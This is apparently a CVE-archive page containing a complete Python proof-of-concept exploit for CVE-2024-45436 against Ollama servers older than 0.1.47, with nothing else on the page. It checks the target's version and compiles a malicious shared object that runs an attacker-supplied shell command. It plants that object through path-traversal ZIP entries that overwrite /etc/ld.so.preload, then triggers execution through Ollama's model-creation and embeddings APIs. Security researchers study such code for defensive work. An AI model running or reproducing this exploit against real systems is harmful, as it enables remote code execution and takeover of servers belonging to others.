4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exp.py PY
#!/usr/bin/env python3
import argparse
import hashlib
import json
import os
import subprocess
import zipfile
import requests
import sys
from urllib.parse import urlparse

# Payload template for the malicious shared object
CODE = """#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void __attribute__((constructor)) myInitFunction() {
    const char *f1 = "/etc/ld.so.preload";
    const char *f2 = "/tmp/hook.so";
    unlink(f1);
    unlink(f2);
    system("bash -c '%s'");
}"""

def print_status(message, is_error=False):
    """Print colored status messages"""
    if is_error:
        print(f"\033[91m[!] {message}\033[0m")
    else:
        print(f"\033[94m[+] {message}\033[0m")

def format_url(url):
    """Format and validate the URL"""
    if not url.startswith(('http://', 'https://')):
        url = 'http://' + url
    
    parsed_url = urlparse(url)
    return f"{parsed_url.scheme}://{parsed_url.netloc}"

def check_vulnerability(target_url):
    """Check if the target is vulnerable"""
    try:
        res = requests.get(f"{target_url}/api/version", timeout=5)
        
        if res.status_code != 200:
            return False
            
        json_data = res.json()
        if "version" not in json_data:
            return False
            
        # Check if version is less than 0.1.47
        v1 = list(map(int, json_data["version"].split('.')))
        v2 = list(map(int, "0.1.47".split('.')))
        
        for num1, num2 in zip(v1, v2):
            if num1 < num2:
                return True
            elif num1 > num2:
                return False
                
        return len(v1) < len(v2)
    except:
        return False

def create_malicious_so(cmd):
    """Generate malicious shared object file"""
    code = CODE % cmd
    with open('tmp.c', 'w') as f:
        f.write(code)

    try:
        subprocess.run(['gcc', 'tmp.c', '-o', 'hook.so', '-fPIC', '-shared', '-ldl', '-D_GNU_SOURCE'], 
                      check=True, stderr=subprocess.PIPE)
        return True
    except subprocess.CalledProcessError as e:
        print_status(f"Failed to compile hook.so: {e.stderr.decode()}", True)
        return False

def create_malicious_zip():
    """Create ZIP file with directory traversal for payload delivery"""
    try:
        with zipfile.ZipFile('evil.zip', 'w') as zipf:
            zipf.writestr('../../../../../../../../../../etc/ld.so.preload', '/tmp/hook.so')
            with open('hook.so', 'rb') as so_file:
                zipf.writestr('../../../../../../../../../../tmp/hook.so', so_file.read())
        return True
    except Exception as e:
        print_status(f"Failed to create ZIP: {str(e)}", True)
        return False

def upload_payload(target_url):
    """Upload the payload blob"""
    try:
        with open('evil.zip', 'rb') as f:
            file_content = f.read()
            h = hashlib.sha256()
            h.update(file_content)
            blob_name = f"sha256:{h.hexdigest()}"
            
            f.seek(0)
            res = requests.post(f"{target_url}/api/blobs/{blob_name}", data=f, timeout=10)
            
            if res.status_code != 201:
                print_status(f"Warning: Blob upload returned status {res.status_code}", True)
                
        return blob_name
    except Exception as e:
        print_status(f"Failed to upload blob: {str(e)}", True)
        return None

def create_model(target_url, blob_path):
    """Create a model that references the malicious blob"""
    try:
        json_content = json.dumps({"name": "test", "modelfile": f"FROM /root/.ollama/models/blobs/{blob_path}"})
        res = requests.post(
            f"{target_url}/api/create", 
            headers={'Content-Type': 'application/json'}, 
            data=json_content,
            timeout=10
        )
        
        return res.status_code == 200
    except Exception as e:
        print_status(f"Failed to create model: {str(e)}", True)
        return False

def trigger_execution(target_url):
    """Trigger code execution through embeddings API"""
    model = "all-minilm:22m"
    
    for i in range(3):
        print_status(f"Execution attempt {i+1}/3...")
        try:
            json_content = json.dumps({"model": model, "keep_alive": 0})
            res = requests.post(
                f"{target_url}/api/embeddings", 
                headers={'Content-Type': 'application/json'}, 
                data=json_content,
                timeout=15
            )
            
            if res.status_code == 200:
                print_status("Execution successful")
                return True
                
        except Exception:
            pass
            
        # Pull the model if it's not available
        try:
            print_status("Pulling required model, please wait...")
            json_content = json.dumps({"name": model})
            res = requests.post(
                f"{target_url}/api/pull", 
                headers={'Content-Type': 'application/json'}, 
                data=json_content,
                timeout=120  # Allow longer timeout for model pull
            )
        except:
            continue
    
    return False

def cleanup():
    """Clean up temporary files"""
    for f in ['tmp.c', 'hook.so', 'evil.zip']:
        if os.path.exists(f):
            try:
                os.remove(f)
            except:
                pass

def main():
    parser = argparse.ArgumentParser(description='Ollama CVE-2024-45436 Remote Command Execution Exploit')
    parser.add_argument('target', help='Target URL (e.g. http://example.com:11434)')
    parser.add_argument('command', help='Command to execute on the target')
    parser.add_argument('--no-cleanup', action='store_true', help='Do not remove temporary files')
    args = parser.parse_args()

    print("\n=== Ollama CVE-2024-45436 Exploit ===\n")
    
    # Format and validate the URL
    target_url = format_url(args.target)
    print_status(f"Target: {target_url}")
    print_status(f"Command: {args.command}")
    
    # Check if target is vulnerable
    print_status("Checking if target is vulnerable...")
    if not check_vulnerability(target_url):
        print_status("Target does not appear to be vulnerable", True)
        sys.exit(1)
    print_status("Target is vulnerable!")
    
    # Create malicious shared object
    print_status("Creating malicious shared object...")
    if not create_malicious_so(args.command):
        print_status("Failed to create shared object", True)
        cleanup()
        sys.exit(1)
    
    # Create malicious ZIP
    print_status("Creating ZIP payload...")
    if not create_malicious_zip():
        print_status("Failed to create ZIP payload", True)
        cleanup()
        sys.exit(1)
    
    # Upload payload
    print_status("Uploading payload...")
    blob_name = upload_payload(target_url)
    if not blob_name:
        print_status("Failed to upload payload", True)
        cleanup()
        sys.exit(1)
    print_status(f"Payload uploaded: {blob_name}")
    
    # Create model with payload
    print_status("Creating model...")
    if not create_model(target_url, blob_name.replace(':', '-')):
        print_status("Failed to create model", True)
        cleanup()
        sys.exit(1)
    
    # Trigger execution
    print_status("Triggering exploitation...")
    success = trigger_execution(target_url)
    
    # Clean up
    if not args.no_cleanup:
        print_status("Cleaning up temporary files...")
        cleanup()
    
    if success:
        print("\n\033[92m[✓] Exploit completed successfully!\033[0m")
    else:
        print("\n\033[91m[✗] Exploit may have failed. Check if your command executed.\033[0m")
        print("\033[93m    Note: Some commands may execute silently. Check your listener if applicable.\033[0m")
    
    print("\n=== Exploit finished ===\n")

if __name__ == "__main__":
    main()